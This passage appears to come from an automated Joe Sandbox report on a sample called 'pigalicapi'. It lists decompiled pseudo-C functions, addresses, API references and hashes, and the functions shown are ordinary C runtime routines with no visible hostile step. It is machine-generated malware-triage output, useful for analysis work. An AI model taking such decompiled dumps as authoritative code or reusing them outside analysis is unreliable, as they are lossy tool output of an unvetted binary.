                                                                                                                                                                                                                                                                      					L9:
                                                                                                                                                                                                                                                                      					_t69 =  &(_t69[4]);
                                                                                                                                                                                                                                                                      					goto L11;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				asm("sbb eax, eax");
                                                                                                                                                                                                                                                                      				E00FBE270();
                                                                                                                                                                                                                                                                      				_t69 = _t71;
                                                                                                                                                                                                                                                                      				if(_t69 == 0) {
                                                                                                                                                                                                                                                                      					goto L14;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				 *_t69 = 0xcccc;
                                                                                                                                                                                                                                                                      				goto L9;
                                                                                                                                                                                                                                                                      			}




















                                                                                                                                                                                                                                                                      0x00fba505
                                                                                                                                                                                                                                                                      0x00fba50c
                                                                                                                                                                                                                                                                      0x00fba518
                                                                                                                                                                                                                                                                      0x00fba51d
                                                                                                                                                                                                                                                                      0x00fba522
                                                                                                                                                                                                                                                                      0x00fba527
                                                                                                                                                                                                                                                                      0x00fba52a
                                                                                                                                                                                                                                                                      0x00fba52c
                                                                                                                                                                                                                                                                      0x00fba52c
                                                                                                                                                                                                                                                                      0x00fba531
                                                                                                                                                                                                                                                                      0x00fba54a
                                                                                                                                                                                                                                                                      0x00fba550
                                                                                                                                                                                                                                                                      0x00fba555
                                                                                                                                                                                                                                                                      0x00fba5f4
                                                                                                                                                                                                                                                                      0x00fba5f8
                                                                                                                                                                                                                                                                      0x00fba5fd
                                                                                                                                                                                                                                                                      0x00fba5fd
                                                                                                                                                                                                                                                                      0x00fba619
                                                                                                                                                                                                                                                                      0x00fba619
                                                                                                                                                                                                                                                                      0x00fba55b
                                                                                                                                                                                                                                                                      0x00fba563
                                                                                                                                                                                                                                                                      0x00fba567
                                                                                                                                                                                                                                                                      0x00fba5b3
                                                                                                                                                                                                                                                                      0x00fba5b5
                                                                                                                                                                                                                                                                      0x00fba5b7
                                                                                                                                                                                                                                                                      0x00fba5bc
                                                                                                                                                                                                                                                                      0x00fba5d3
                                                                                                                                                                                                                                                                      0x00fba5db
                                                                                                                                                                                                                                                                      0x00fba5eb
                                                                                                                                                                                                                                                                      0x00fba5eb
                                                                                                                                                                                                                                                                      0x00fba5db
                                                                                                                                                                                                                                                                      0x00fba5ed
                                                                                                                                                                                                                                                                      0x00fba5ee
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fba5f3
                                                                                                                                                                                                                                                                      0x00fba56e
                                                                                                                                                                                                                                                                      0x00fba570
                                                                                                                                                                                                                                                                      0x00fba572
                                                                                                                                                                                                                                                                      0x00fba57a
                                                                                                                                                                                                                                                                      0x00fba597
                                                                                                                                                                                                                                                                      0x00fba5a1
                                                                                                                                                                                                                                                                      0x00fba5a6
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fba5a8
                                                                                                                                                                                                                                                                      0x00fba5ae
                                                                                                                                                                                                                                                                      0x00fba5ae
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fba5ae
                                                                                                                                                                                                                                                                      0x00fba57e
                                                                                                                                                                                                                                                                      0x00fba582
                                                                                                                                                                                                                                                                      0x00fba587
                                                                                                                                                                                                                                                                      0x00fba58b
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fba58d
                                                                                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,?), ref: 00FBA54A
                                                                                                                                                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 00FBA582
                                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00FBA5D3
                                                                                                                                                                                                                                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00FBA5E5
                                                                                                                                                                                                                                                                      • __freea.LIBCMT ref: 00FBA5EE
                                                                                                                                                                                                                                                                        • Part of subcall function 00FBBD19: RtlAllocateHeap.NTDLL(00000000,?,?,?,00FBA5A1,00000000), ref: 00FBBD4B
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.816390745.0000000000FB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.816295604.0000000000FB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.816834724.0000000000FC9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.817552219.000000000100C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.818143401.000000000104D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.818176629.000000000104F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_fb0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 313313983-0
                                                                                                                                                                                                                                                                      • Opcode ID: d28431eeb1c1adea8a615c265594bb8175dd248af3667e46771560b6618baeca
                                                                                                                                                                                                                                                                      • Instruction ID: da3201a85d77dbfad313d62ba5dcadc241b62a07d7bc28558d03da4c361aaa46
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d28431eeb1c1adea8a615c265594bb8175dd248af3667e46771560b6618baeca
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D731AEB2A0021AABDF259F66DC45EEE7BA5EF40320F080168FC15D7150E739DE54EB91
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      C-Code - Quality: 82%
                                                                                                                                                                                                                                                                      			E00FB9CB4(void* __ecx, void* __edx) {
                                                                                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                                                                                      				intOrPtr _t2;
                                                                                                                                                                                                                                                                      				void* _t4;
                                                                                                                                                                                                                                                                      				void* _t10;
                                                                                                                                                                                                                                                                      				void* _t11;
                                                                                                                                                                                                                                                                      				void* _t13;
                                                                                                                                                                                                                                                                      				void* _t16;
                                                                                                                                                                                                                                                                      				long _t17;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_t11 = __ecx;
                                                                                                                                                                                                                                                                      				_t17 = GetLastError();
                                                                                                                                                                                                                                                                      				_t10 = 0;
                                                                                                                                                                                                                                                                      				_t2 =  *0x104d70c; // 0x2
                                                                                                                                                                                                                                                                      				_t20 = _t2 - 0xffffffff;
                                                                                                                                                                                                                                                                      				if(_t2 == 0xffffffff) {
                                                                                                                                                                                                                                                                      					L2:
                                                                                                                                                                                                                                                                      					_t16 = E00FBA67D(_t11, 1, 0x364);
                                                                                                                                                                                                                                                                      					_pop(_t13);
                                                                                                                                                                                                                                                                      					if(_t16 != 0) {
                                                                                                                                                                                                                                                                      						_t4 = E00FBA92D(_t13, _t17, __eflags,  *0x104d70c, _t16);
                                                                                                                                                                                                                                                                      						__eflags = _t4;
                                                                                                                                                                                                                                                                      						if(_t4 != 0) {
                                                                                                                                                                                                                                                                      							E00FB9AA2(_t13, _t16, 0x104df44);
                                                                                                                                                                                                                                                                      							E00FBA6DA(_t10);
                                                                                                                                                                                                                                                                      							__eflags = _t16;
                                                                                                                                                                                                                                                                      							if(_t16 != 0) {
                                                                                                                                                                                                                                                                      								goto L9;
                                                                                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                                                                                      								goto L8;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                                                                                      							_push(_t16);
                                                                                                                                                                                                                                                                      							goto L4;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                                                      						_push(_t10);
                                                                                                                                                                                                                                                                      						L4:
                                                                                                                                                                                                                                                                      						E00FBA6DA();
                                                                                                                                                                                                                                                                      						L8:
                                                                                                                                                                                                                                                                      						SetLastError(_t17);
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                                                      					_t16 = E00FBA8D7(_t11, _t17, _t20, _t2);
                                                                                                                                                                                                                                                                      					if(_t16 != 0) {
                                                                                                                                                                                                                                                                      						L9:
                                                                                                                                                                                                                                                                      						SetLastError(_t17);
                                                                                                                                                                                                                                                                      						_t10 = _t16;
                                                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                                                      						goto L2;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				return _t10;
                                                                                                                                                                                                                                                                      			}











                                                                                                                                                                                                                                                                      0x00fb9cb4
                                                                                                                                                                                                                                                                      0x00fb9cbf
                                                                                                                                                                                                                                                                      0x00fb9cc1
                                                                                                                                                                                                                                                                      0x00fb9cc3
                                                                                                                                                                                                                                                                      0x00fb9cc8
                                                                                                                                                                                                                                                                      0x00fb9ccb
                                                                                                                                                                                                                                                                      0x00fb9cd9
                                                                                                                                                                                                                                                                      0x00fb9ce5
                                                                                                                                                                                                                                                                      0x00fb9ce8
                                                                                                                                                                                                                                                                      0x00fb9ceb
                                                                                                                                                                                                                                                                      0x00fb9cfd
                                                                                                                                                                                                                                                                      0x00fb9d02
                                                                                                                                                                                                                                                                      0x00fb9d04
                                                                                                                                                                                                                                                                      0x00fb9d0f
                                                                                                                                                                                                                                                                      0x00fb9d15
                                                                                                                                                                                                                                                                      0x00fb9d1d
                                                                                                                                                                                                                                                                      0x00fb9d1f
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fb9d06
                                                                                                                                                                                                                                                                      0x00fb9d06
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fb9d06
                                                                                                                                                                                                                                                                      0x00fb9ced
                                                                                                                                                                                                                                                                      0x00fb9ced
                                                                                                                                                                                                                                                                      0x00fb9cee
                                                                                                                                                                                                                                                                      0x00fb9cee
                                                                                                                                                                                                                                                                      0x00fb9d21
                                                                                                                                                                                                                                                                      0x00fb9d22
                                                                                                                                                                                                                                                                      0x00fb9d22
                                                                                                                                                                                                                                                                      0x00fb9ccd
                                                                                                                                                                                                                                                                      0x00fb9cd3
                                                                                                                                                                                                                                                                      0x00fb9cd7
                                                                                                                                                                                                                                                                      0x00fb9d2a
                                                                                                                                                                                                                                                                      0x00fb9d2b
                                                                                                                                                                                                                                                                      0x00fb9d31
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fb9cd7
                                                                                                                                                                                                                                                                      0x00fb9d38

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00FB982B,00FBA6CF,?,00FB9C5E,00000001,00000364,?,00FB4B88,?), ref: 00FB9CB9
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00FB9CEE
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00FB9D15
                                                                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?), ref: 00FB9D22
                                                                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?), ref: 00FB9D2B
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.816390745.0000000000FB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.816295604.0000000000FB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.816834724.0000000000FC9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.817552219.000000000100C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.818143401.000000000104D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.818176629.000000000104F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_fb0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3170660625-0
                                                                                                                                                                                                                                                                      • Opcode ID: 0e7aeb85f9522c5509467ea1e850c690088e581f326eb49abca1e717e56923ee
                                                                                                                                                                                                                                                                      • Instruction ID: 22d29d5ed17a645fc91947afa300549c4fb7f5692df89ea0acd590da2bab2a2a
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0e7aeb85f9522c5509467ea1e850c690088e581f326eb49abca1e717e56923ee
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DD0126B660C70567821263739E89EDB366EEBE53B03210028FA6693191EBE98C057A11
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                                                                                      			E00FBBB90(intOrPtr* _a4) {
                                                                                                                                                                                                                                                                      				intOrPtr _t6;
                                                                                                                                                                                                                                                                      				intOrPtr* _t21;
                                                                                                                                                                                                                                                                      				void* _t23;
                                                                                                                                                                                                                                                                      				void* _t24;
                                                                                                                                                                                                                                                                      				void* _t25;
                                                                                                                                                                                                                                                                      				void* _t26;
                                                                                                                                                                                                                                                                      				void* _t27;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_t21 = _a4;
                                                                                                                                                                                                                                                                      				if(_t21 != 0) {
                                                                                                                                                                                                                                                                      					_t23 =  *_t21 -  *0x104dd10; // 0x104dd08
                                                                                                                                                                                                                                                                      					if(_t23 != 0) {
                                                                                                                                                                                                                                                                      						E00FBA6DA(_t7);
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x104dd14; // 0x104e181
                                                                                                                                                                                                                                                                      					if(_t24 != 0) {
                                                                                                                                                                                                                                                                      						E00FBA6DA(_t8);
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x104dd18; // 0x104e181
                                                                                                                                                                                                                                                                      					if(_t25 != 0) {
                                                                                                                                                                                                                                                                      						E00FBA6DA(_t9);
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x104dd40; // 0x104dd0c
                                                                                                                                                                                                                                                                      					if(_t26 != 0) {
                                                                                                                                                                                                                                                                      						E00FBA6DA(_t10);
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					_t6 =  *((intOrPtr*)(_t21 + 0x34));
                                                                                                                                                                                                                                                                      					_t27 = _t6 -  *0x104dd44; // 0x104e184
                                                                                                                                                                                                                                                                      					if(_t27 != 0) {
                                                                                                                                                                                                                                                                      						return E00FBA6DA(_t6);
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				return _t6;
                                                                                                                                                                                                                                                                      			}










                                                                                                                                                                                                                                                                      0x00fbbb96
                                                                                                                                                                                                                                                                      0x00fbbb9b
                                                                                                                                                                                                                                                                      0x00fbbb9f
                                                                                                                                                                                                                                                                      0x00fbbba5
                                                                                                                                                                                                                                                                      0x00fbbba8
                                                                                                                                                                                                                                                                      0x00fbbbad
                                                                                                                                                                                                                                                                      0x00fbbbb1
                                                                                                                                                                                                                                                                      0x00fbbbb7
                                                                                                                                                                                                                                                                      0x00fbbbba
                                                                                                                                                                                                                                                                      0x00fbbbbf
                                                                                                                                                                                                                                                                      0x00fbbbc3
                                                                                                                                                                                                                                                                      0x00fbbbc9
                                                                                                                                                                                                                                                                      0x00fbbbcc
                                                                                                                                                                                                                                                                      0x00fbbbd1
                                                                                                                                                                                                                                                                      0x00fbbbd5
                                                                                                                                                                                                                                                                      0x00fbbbdb
                                                                                                                                                                                                                                                                      0x00fbbbde
                                                                                                                                                                                                                                                                      0x00fbbbe3
                                                                                                                                                                                                                                                                      0x00fbbbe4
                                                                                                                                                                                                                                                                      0x00fbbbe7
                                                                                                                                                                                                                                                                      0x00fbbbed
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00fbbbf5
                                                                                                                                                                                                                                                                      0x00fbbbed
                                                                                                                                                                                                                                                                      0x00fbbbf8

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00FBBBA8
                                                                                                                                                                                                                                                                        • Part of subcall function 00FBA6DA: HeapFree.KERNEL32(00000000,00000000,?,00FBBC27,?,00000000,?,00000000,?,00FBBC4E,?,00000007,?,?,00FBADC4,?), ref: 00FBA6F0
                                                                                                                                                                                                                                                                        • Part of subcall function 00FBA6DA: GetLastError.KERNEL32(?,?,00FBBC27,?,00000000,?,00000000,?,00FBBC4E,?,00000007,?,?,00FBADC4,?,?), ref: 00FBA702
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00FBBBBA
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00FBBBCC
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00FBBBDE
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00FBBBF0
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.816390745.0000000000FB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.816295604.0000000000FB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.816834724.0000000000FC9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.817552219.000000000100C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.818143401.000000000104D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.818176629.000000000104F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_fb0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                                                                                                      • Opcode ID: 5c5ec05f9f882008cee9b1b7c263ad2de9dc556375e6b89a19c6df32755a974c
                                                                                                                                                                                                                                                                      • Instruction ID: 2c018aacca21fe7c03481a9b5289dcfd42630dd59553355510d8df46e5a832dd
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5c5ec05f9f882008cee9b1b7c263ad2de9dc556375e6b89a19c6df32755a974c
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D8F068B2A04100AB8534EA56EAC1C9A73DAFB503A03684815F4D9D7905CB79FC80AF54
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      C-Code - Quality: 91%
                                                                                                                                                                                                                                                                      			E00FC160F(signed int __ecx) {
                                                                                                                                                                                                                                                                      				intOrPtr _t7;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				asm("lock xadd [eax], ecx");
                                                                                                                                                                                                                                                                      				if((__ecx | 0xffffffff) == 0) {
                                                                                                                                                                                                                                                                      					_t7 =  *0x104dd00; // 0x10e2758
                                                                                                                                                                                                                                                                      					if(_t7 != 0x104dae0) {
                                                                                                                                                                                                                                                                      						E00FBA6DA(_t7);
                                                                                                                                                                                                                                                                      						 *0x104dd00 = 0x104dae0;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				E00FBA6DA( *0x104ea34);
                                                                                                                                                                                                                                                                      				 *0x104ea34 = 0;
                                                                                                                                                                                                                                                                      				E00FBA6DA( *0x104ea38);
                                                                                                                                                                                                                                                                      				 *0x104ea38 = 0;
                                                                                                                                                                                                                                                                      				E00FBA6DA( *0x104e818);
                                                                                                                                                                                                                                                                      				 *0x104e818 = 0;
                                                                                                                                                                                                                                                                      				E00FBA6DA( *0x104e81c);
                                                                                                                                                                                                                                                                      				 *0x104e81c = 0;
                                                                                                                                                                                                                                                                      				return 1;
                                                                                                                                                                                                                                                                      			}




                                                                                                                                                                                                                                                                      0x00fc1618
                                                                                                                                                                                                                                                                      0x00fc161c
                                                                                                                                                                                                                                                                      0x00fc161e
                                                                                                                                                                                                                                                                      0x00fc162a
                                                                                                                                                                                                                                                                      0x00fc162d
                                                                                                                                                                                                                                                                      0x00fc1633
                                                                                                                                                                                                                                                                      0x00fc1633
                                                                                                                                                                                                                                                                      0x00fc162a
                                                                                                                                                                                                                                                                      0x00fc163f
                                                                                                                                                                                                                                                                      0x00fc164c
                                                                                                                                                                                                                                                                      0x00fc1652
                                                                                                                                                                                                                                                                      0x00fc165d
                                                                                                                                                                                                                                                                      0x00fc1663
                                                                                                                                                                                                                                                                      0x00fc166e
                                                                                                                                                                                                                                                                      0x00fc1674
                                                                                                                                                                                                                                                                      0x00fc167c
                                                                                                                                                                                                                                                                      0x00fc1685

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00FC162D
                                                                                                                                                                                                                                                                        • Part of subcall function 00FBA6DA: HeapFree.KERNEL32(00000000,00000000,?,00FBBC27,?,00000000,?,00000000,?,00FBBC4E,?,00000007,?,?,00FBADC4,?), ref: 00FBA6F0
                                                                                                                                                                                                                                                                        • Part of subcall function 00FBA6DA: GetLastError.KERNEL32(?,?,00FBBC27,?,00000000,?,00000000,?,00FBBC4E,?,00000007,?,?,00FBADC4,?,?), ref: 00FBA702
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00FC163F
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00FC1652
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00FC1663
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00FC1674
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.816390745.0000000000FB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.816295604.0000000000FB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.816834724.0000000000FC9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.817552219.000000000100C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.818143401.000000000104D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.818176629.000000000104F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_fb0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                                                                                                      • Opcode ID: b8c74414aee59cf00f354d39f1ffbb809689c6921c167388c573ede75716d851
                                                                                                                                                                                                                                                                      • Instruction ID: d31dff7cb8cc4411402f2f8c8e75e88b4b0a1d2aaedb659dce3e1917f800bb8d
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b8c74414aee59cf00f354d39f1ffbb809689c6921c167388c573ede75716d851
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B7F0B4F8A041209BDA226F55FFC24443B61F734764308012AF4D582669C73F1862BFC6
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      C-Code - Quality: 88%
                                                                                                                                                                                                                                                                      			E00FC0FD5(intOrPtr _a4) {
                                                                                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                                                                                      				void* _v12;
                                                                                                                                                                                                                                                                      				char _v16;
                                                                                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                                                                                      				intOrPtr* _t35;
                                                                                                                                                                                                                                                                      				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                                                      				struct HINSTANCE__* _t42;
                                                                                                                                                                                                                                                                      				intOrPtr* _t43;
                                                                                                                                                                                                                                                                      				intOrPtr* _t44;
                                                                                                                                                                                                                                                                      				WCHAR* _t48;
                                                                                                                                                                                                                                                                      				struct HINSTANCE__* _t49;
                                                                                                                                                                                                                                                                      				struct HINSTANCE__* _t53;
                                                                                                                                                                                                                                                                      				intOrPtr* _t56;
                                                                                                                                                                                                                                                                      				struct HINSTANCE__* _t61;
                                                                                                                                                                                                                                                                      				intOrPtr _t62;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				if(_a4 == 2 || _a4 == 1) {
                                                                                                                                                                                                                                                                      					GetModuleFileNameW(0, 0x104e5f0, 0x104);
                                                                                                                                                                                                                                                                      					_t48 =  *0x104e824; // 0x10d1c30
                                                                                                                                                                                                                                                                      					 *0x104e828 = 0x104e5f0;
                                                                                                                                                                                                                                                                      					if(_t48 == 0 ||  *_t48 == 0) {
                                                                                                                                                                                                                                                                      						_t48 = 0x104e5f0;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					_v8 = 0;
                                                                                                                                                                                                                                                                      					_v16 = 0;
                                                                                                                                                                                                                                                                      					E00FC10F4(_t48, 0, 0,  &_v8,  &_v16);
                                                                                                                                                                                                                                                                      					_t61 = E00FC127A(_v8, _v16, 2);
                                                                                                                                                                                                                                                                      					if(_t61 != 0) {
                                                                                                                                                                                                                                                                      						E00FC10F4(_t48, _t61, _t61 + _v8 * 4,  &_v8,  &_v16);
                                                                                                                                                                                                                                                                      						if(_a4 != 1) {
                                                                                                                                                                                                                                                                      							_v12 = 0;
                                                                                                                                                                                                                                                                      							_push( &_v12);
                                                                                                                                                                                                                                                                      							_t49 = E00FC1CBE(_t48, 0, _t61, _t61);
                                                                                                                                                                                                                                                                      							if(_t49 == 0) {
                                                                                                                                                                                                                                                                      								_t56 = _v12;
                                                                                                                                                                                                                                                                      								_t53 = 0;
                                                                                                                                                                                                                                                                      								_t35 = _t56;
                                                                                                                                                                                                                                                                      								if( *_t56 == 0) {
                                                                                                                                                                                                                                                                      									L15:
                                                                                                                                                                                                                                                                      									_t36 = 0;
                                                                                                                                                                                                                                                                      									 *0x104e814 = _t53;
                                                                                                                                                                                                                                                                      									_v12 = 0;
                                                                                                                                                                                                                                                                      									_t49 = 0;
                                                                                                                                                                                                                                                                      									 *0x104e81c = _t56;
                                                                                                                                                                                                                                                                      									L16:
                                                                                                                                                                                                                                                                      									E00FBA6DA(_t36);
                                                                                                                                                                                                                                                                      									_v12 = 0;
                                                                                                                                                                                                                                                                      									goto L17;
                                                                                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                                                                                      									goto L14;
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      								do {
                                                                                                                                                                                                                                                                      									L14:
                                                                                                                                                                                                                                                                      									_t35 = _t35 + 4;
                                                                                                                                                                                                                                                                      									_t53 =  &(_t53->i);
                                                                                                                                                                                                                                                                      								} while ( *_t35 != 0);
                                                                                                                                                                                                                                                                      								goto L15;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							_t36 = _v12;
                                                                                                                                                                                                                                                                      							goto L16;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						 *0x104e814 = _v8 - 1;
                                                                                                                                                                                                                                                                      						_t42 = _t61;
                                                                                                                                                                                                                                                                      						_t61 = 0;
                                                                                                                                                                                                                                                                      						 *0x104e81c = _t42;
                                                                                                                                                                                                                                                                      						goto L10;
                                                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                                                      						_t43 = E00FB9826();
                                                                                                                                                                                                                                                                      						_push(0xc);
                                                                                                                                                                                                                                                                      						_pop(0);
